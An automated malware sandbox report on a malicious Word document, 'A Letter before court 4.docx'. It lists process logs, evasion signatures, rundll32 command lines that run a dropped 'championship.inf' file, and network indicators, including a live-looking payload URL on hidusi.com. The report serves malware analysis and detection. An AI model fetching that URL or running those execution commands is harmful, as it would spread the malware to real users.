Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Found dropped PE file which has not been started or loaded
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\championship.inf Jump to dropped file

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123', Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123', Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123', Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123', Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123', Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123', Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:123',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:../../../AppData/Local/Temp/Low/championship.inf',
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL '.cpl:../../../AppData/Local/Temp/championship.inf',
Source: C:\Windows\SysWOW64\control.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\control.exe Process created: unknown unknown

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 476188 Sample: A Letter before court 4.docx Startdate: 02/09/2021 Architecture: WINDOWS Score: 72 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Multi AV Scanner detection for dropped file 2->59 61 Document exploit detected (drops PE files) 2->61 63 2 other signatures 2->63 8 WINWORD.EXE 77 77 2->8         started        process3 dnsIp4 53 hidusi.com 23.106.160.25, 49706, 49707, 49708 LEASEWEB-USA-SFO-12US United States 8->53 51 C:\Users\user\AppData\...\championship.inf, PE32+ 8->51 dropped 12 control.exe 1 8->12         started        15 control.exe 1 8->15         started        17 control.exe 1 8->17         started        19 11 other processes 8->19 file5 process6 dnsIp7 55 192.168.2.1 unknown unknown 12->55 21 rundll32.exe 12->21         started        23 rundll32.exe 15->23         started        25 rundll32.exe 17->25         started        27 rundll32.exe 19->27         started        29 rundll32.exe 19->29         started        31 rundll32.exe 19->31         started        33 5 other processes 19->33 process8 process9 35 rundll32.exe 21->35         started        37 rundll32.exe 23->37         started        39 rundll32.exe 25->39         started        41 rundll32.exe 27->41         started        43 rundll32.exe 29->43         started        45 rundll32.exe 31->45         started        47 rundll32.exe 33->47         started        49 rundll32.exe 33->49         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
23.106.160.25
 hidusi.com United States
7203 LEASEWEB-USA-SFO-12US true

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
hidusi.com 23.106.160.25 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://hidusi.com/e8c76295a5f9acb7/ministry.cab true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown